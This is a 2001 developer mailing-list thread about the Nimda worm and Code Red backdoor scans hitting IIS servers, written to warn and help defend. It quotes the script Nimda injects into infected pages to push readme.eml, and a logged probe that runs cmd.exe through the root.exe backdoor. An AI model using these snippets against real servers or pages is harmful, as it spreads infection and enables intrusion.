Looks like a new virus called "W32.Nimda.A@mm" a variant on the proof of
concept code blue worm.
This virus has a two prong attack one via E-mail and via the Unicode Web
Traversal exploit.
"the worm sends out probes to IIS servers attempting to spread by using the
Unicode Web Traversal exploit similar to W32.BlueCode.Worm. Compromised
servers may display a web page prompting a visitor to download an Outlook
file which contains the worm as an attachment." - Symantec
http:[EMAIL PROTECTED]
http://securityresponse.symantec.com/avcenter/venc/data/w32.bluecode.worm.ht
ml
Very little is know about the new W32.Nimda.A@mm virus. Here is what I see.
If infected your webserver will include this text at the bottom of the home
page:
<html><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>
<html><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>
This JS will prompt you to download a file by the name of readme.eml which
contains the worm as an attachment.
This ia all I know now....
Mark W. Breneman
-Cold Fusion Developer
-Network Administrator
Vivid Media
[EMAIL PROTECTED]
www.vividmedia.com
608.270.9770
-----Original Message-----
From: webmaster [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:31 AM
To: CF-Talk
Subject: Re: Code Red backdoor triggered?
we're seeing a HUGE number of hits all containing :-
port=3641 probes and URL=/c/winnt/system32/cmd.exe attempts and guess where
they're coming from ?
the exact same machines that rountinly have been doing the code red thing .
Damn
Message -----
From: "Paris Lundis" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 8:02 AM
Subject: RE: Code Red backdoor triggered?
> Uggh! not the code-red variations again...
>
> Can you tell us Rich if it is impacting the servers ?? Are you
> patched, and does this thing use something new or is it the same
> exploit as before...
>
> Seems like it is becoming a net-30 terror :)
>
> -paris
> [finding the future in the past, passing the future in the present]
> [connecting people, places and things]
>
>
> -----Original Message-----
> From: Rich Wild <[EMAIL PROTECTED]>
> Date: Tue, 18 Sep 2001 15:37:13 +0100
> Subject: RE: Code Red backdoor triggered?
>
> > even we're getting hammered with syn flood attacks.
> >
> > Rich Wild
> >
> > > -----Original Message-----
> > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > Sent: 18 September 2001 15:52
> > > To: CF-Talk
> > > Subject: FW: Code Red backdoor triggered?
> > >
> > >
> > > It seems there may be some unusual network activity today
> > > worth noting.
> > >
> > > Dave Watts, CTO, Fig Leaf Software
> > > http://www.figleaf.com/
> > > voice: (202) 797-5496
> > > fax: (202) 797-5444
> > >
> > >
> > > -----Original Message-----
> > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > Sent: Tuesday, 18 September, 2001 10:49
> > > To: [EMAIL PROTECTED]
> > > Subject: RE: Code Red backdoor triggered?
> > >
> > >
> > > > Heads up. Pay attention to your servers today. I just
> > > > started detecting a *ton* of these requests. I think it's
> > > > a follow-up worm programmed to take advantage of the
> > > > backdoors Code Red dropped on infected computers. Maybe a
> > > > Code Red III?
> > > >
> > > > -Cameron
> > > >
> > > > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > > > dhcp181.onewebsystems.com
> > > > (130.205.102.181) on port 80 (tcp).
> > > > [09/18/2001 09:25:55.166 GMT-0400] GET
> > > > /scripts/root.exe?/c+dir HTTP/1.0
> > > > Host: www
> > > > Connnection: close
> > >
> > > After a more careful reading, I don't think this is an attack
> > > at all. I
> > > think it's worse than an attack.
> > >
> > > The GET request doesn't do anything except run the DOS dir
> > > command using the
> > > command processor. But, if a server responds with an HTTP 200
> > > status code,
> > > this indicates that the server is vulnerable to running
> > > cmd.exe through the
> > > web server.
> > >
> > > So, my guess is that this is a vulnerability scan. Once a
> > > list of vulnerable
> > > servers is compiled, a real attack would take much less time
> > > than a Code
> > > Red-style attack, since you could build the list of
> > > vulnerable servers into
> > > the attack code!
> > >
> > > This idea has been discussed a bit in the last month or so -
> > > it's called a
> > > "Warhol" worm, the idea being that an attack might cover the mass
> > of
> > > vulnerable machines in fifteen minutes. Here's a URL to the
> > article:
> > >
> > > http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
> > 5&mode=nocomme
> > nt&threshold=
> >
> > Dave Watts, CTO, Fig Leaf Software
> > http://www.figleaf.com/
> > voice: (202) 797-5496
> > fax: (202) 797-5444
> > ---------------------------------------------------------------------
> > -------
> > ----
> > Control your subscriptions to ACFUG lists via the ACFUG website at
> >
> >
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
